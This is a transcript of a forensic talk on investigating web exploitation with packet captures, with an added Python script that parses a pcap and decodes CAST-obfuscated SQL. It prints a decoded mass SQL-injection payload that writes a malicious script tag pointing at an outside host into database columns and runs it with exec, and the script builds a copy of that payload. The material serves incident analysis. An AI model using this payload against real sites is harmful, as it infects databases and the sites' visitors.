Presentation on theme: "Forensic Investigations of Web Exploitations"— Presentation transcript:
1 Forensic Investigations of Web Exploitations Ondrej Krehel, CISSP, CEH, Lifars LLC
2 What do I do - Digital Firefighters
New cyber jobs
3 Case from cyber field
Scenario: Web server in the DMZ zone. Inbound traffic is filtered, however outbound is not. The server is running an un-patched version of IIS.
Incident occurred ?!? - we need to confirm it and, if yes, start incident response and investigation.
A recorded traffic file is available in pcap format, however we don't have any logs, neither from the firewall nor from the web server.
We want to know what happened and whether we can find traces of attacker commands as well as malware.
Wireshark analysis will be presented.
4 Incident by Breach – All time
DatalossDB.org
6 Cost
The first published study: 2011 Second Annual Cost of Cyber Crime Study by the Ponemon Institute.
An average web-based attack costs $143,209; malicious code, $124,083; and malicious insiders, $100,300.
Web-borne attacks, malicious code and insiders are the most costly, making up more than 90% of all cybercrime costs per organization per year.
7 HTTP GET – RFC 2616
GET /home/site_content_3.asp
D B D003D B C D003D D0 02B B B E006E D B D B B E006E D B D003D D F006E C B E006E D B B C D A002F002F C E006E F E006A E003C002F E B F006D F002E F A C F002E F006C D006E C F002E E D E E E D E E D E E E006E D D B D003D D B D003D E D002C E B C D C B D003D D B D B0
8 HTTP GET Decoded
CAST obfuscated data, after decoding:
trim(convert(varchar,'+b.name+'))+''<script src="http://yl18.net/0.js"></script>'';' from dbo.sysobjects a,dbo.syscolumns b,dbo.systypes c where a.id=b.id and a.xtype='U'and b.xtype=c.xtype and c.name='varchar';set @m=REVERSE(@m);set @m=substring(@m,PATINDEX('%;%',@m),8000);set @m=REVERSE(@m);exec(@m);
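The two steps the slides describe, carving HTTP requests out of a pcap when no server or firewall logs exist and then decoding the CAST-obfuscated hex into readable SQL, can be done with the Python standard library alone. The script below is an added example, not code from the talk or from Lifars. It assumes the injected hex sits inside a CAST(0x... AS NVARCHAR(...)) expression and is UTF-16LE encoded (the interleaved 00 bytes visible in the slide's hex dump); the pcap, the request line, the decoded SQL sample and the script URL are all constructed here, the URL being a placeholder rather than the real one.

```python
"""Added example: parse a libpcap file with the standard library, pull HTTP
request lines from TCP payloads, and decode CAST(0x...) hex as UTF-16LE."""
import re
import struct
from urllib.parse import unquote

# Constructed decoded payload; the tail mirrors the fragment on the slide.
# The script URL is a placeholder, not the real one.
DECODED_SQL = (
    "update [t] set [c]=rtrim(convert(varchar,[c]))"
    "+''<script src=\"http://malicious.example/0.js\"></script>'';"
    "set @m=REVERSE(@m);set @m=substring(@m,PATINDEX('%;%',@m),8000);"
    "set @m=REVERSE(@m);exec(@m);"
)
HEX_PAYLOAD = DECODED_SQL.encode("utf-16-le").hex().upper()

# Constructed request line (assumed shape: hex blob inside CAST in the query string).
SAMPLE_REQUEST = (
    "GET /home/site_content_3.asp?id=1;exec(CAST(0x" + HEX_PAYLOAD
    + "%20AS%20NVARCHAR(4000)))-- HTTP/1.1\r\nHost: www.example.test\r\n\r\n"
).encode("ascii")


def build_pcap(http_request: bytes) -> bytes:
    """Wrap one request in Ethernet/IPv4/TCP inside a libpcap file (constructed capture)."""
    eth = b"\x00" * 6 + b"\x11" * 6 + b"\x08\x00"  # dst MAC, src MAC, EtherType IPv4
    tcp = struct.pack("!HHIIBBHHH", 40000, 80, 1, 1, 5 << 4, 0x18, 8192, 0, 0)
    total = 20 + len(tcp) + len(http_request)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total, 1, 0, 64, 6, 0,
                     bytes([10, 0, 0, 5]), bytes([192, 0, 2, 10]))
    frame = eth + ip + tcp + http_request
    global_hdr = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)  # LINKTYPE_ETHERNET
    rec_hdr = struct.pack("<IIII", 0, 0, len(frame), len(frame))
    return global_hdr + rec_hdr + frame


def iter_tcp_payloads(pcap: bytes):
    """Yield (src_ip, dst_ip, dst_port, payload) for every IPv4/TCP record."""
    magic, = struct.unpack("<I", pcap[:4])
    endian = "<" if magic == 0xA1B2C3D4 else ">"  # byte order of the capture file
    off = 24
    while off + 16 <= len(pcap):
        _, _, incl_len, _ = struct.unpack(endian + "IIII", pcap[off:off + 16])
        off += 16
        frame = pcap[off:off + incl_len]
        off += incl_len
        if len(frame) < 34 or frame[12:14] != b"\x08\x00":  # not IPv4
            continue
        ihl = (frame[14] & 0x0F) * 4
        if frame[23] != 6:  # not TCP
            continue
        src = ".".join(map(str, frame[26:30]))
        dst = ".".join(map(str, frame[30:34]))
        tcp_start = 14 + ihl
        dst_port = struct.unpack("!H", frame[tcp_start + 2:tcp_start + 4])[0]
        data_off = (frame[tcp_start + 12] >> 4) * 4
        yield src, dst, dst_port, frame[tcp_start + data_off:]


CAST_RE = re.compile(r"CAST\s*\(\s*0x([0-9A-Fa-f]+)\s+AS\s+N?VARCHAR", re.IGNORECASE)
INDICATORS = ("declare @", "exec(", "reverse(", "sysobjects", "syscolumns", "<script")


def decode_cast_hex(hex_digits: str) -> str:
    """Decode the CAST hex: UTF-16LE when every second byte is 00, else single-byte."""
    raw = bytes.fromhex(hex_digits)
    if len(raw) % 2 == 0 and all(b == 0 for b in raw[1::2]):
        return raw.decode("utf-16-le")
    return raw.decode("latin-1")


def analyze_pcap(pcap: bytes) -> list:
    """Return one finding per CAST(0x...) expression seen in an HTTP request line."""
    findings = []
    for src, dst, dport, payload in iter_tcp_payloads(pcap):
        if not payload.startswith((b"GET ", b"POST ")):
            continue
        parts = payload.split(b"\r\n", 1)[0].decode("latin-1").split(" ")
        if len(parts) < 2:
            continue
        url = unquote(parts[1])
        for m in CAST_RE.finditer(url):
            sql = decode_cast_hex(m.group(1))
            hits = [i for i in INDICATORS if i in sql.lower()]
            findings.append({"src": src, "dst": dst, "port": dport,
                             "path": url.split("?")[0], "sql": sql, "indicators": hits})
    return findings


SAMPLE_PCAP = build_pcap(SAMPLE_REQUEST)  # what a SPAN-port capture of the request would hold

if __name__ == "__main__":
    for f in analyze_pcap(SAMPLE_PCAP):
        print(f"{f['src']} -> {f['dst']}:{f['port']} {f['path']}")
        print("  decoded:", f["sql"])
        print("  indicators:", ", ".join(f["indicators"]))
```

On a real capture, replace SAMPLE_PCAP with the bytes of the recorded file; the parser only walks the fixed IPv4/TCP offsets, so VLAN-tagged frames or requests split across segments would need reassembly first. The decoded SQL, not the hex, is what should be preserved with the evidence, since the same payload can be re-encoded to evade string-matching rules.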
12 Open Source
DataEcho (http://sourceforge.net/projects/data-echo/ )
EtherPeg (http://www.etherpeg.org/ )
Driftnet ( )
Good article on how to do it in open source: forensics-appliance-howto
13 How to Record
SPAN port (Switched Port Analyzer) or mirror port. Can be part of a SPAN, local or remote VLAN.
Physical tap - TX and RX packets.
Don't use external DNS resolution.
Secure access: use ssh and ssl, segment the network.
21 Tips for Businesses
Establish relationships with vendors before an incident.
Consider subscribing to a Cyber Response or Data Breach program.
Review current layers of protection, and network topology.
Incident Response Plan:
Can you recognize the incident?
Is evidence properly preserved?
Are formalized Incident Response policies in place and tested on an annual basis?
Is internal staff properly trained?
22 Contacts Ondrej Krehel, CISSP, CEH, Information Security Officer Lifars, LLC
23 Abbreviations
C & C – Command and Control Channels
VOIP – Voice over Internet Protocol
SQL – Structured Query Language
MFT – Master File Table
DNS – Domain Name System
P2P – Peer-to-peer networks
UPX – Ultimate Packer for eXecutables
CAST – Encoding and SQL function
MRU – Most Recently Used section in Windows registry
IDS/IPS – Intrusion Detection/Prevention Systems
LKM – Loadable Kernel Module
IM – Instant Messaging
TCP/UDP – Common transfer protocols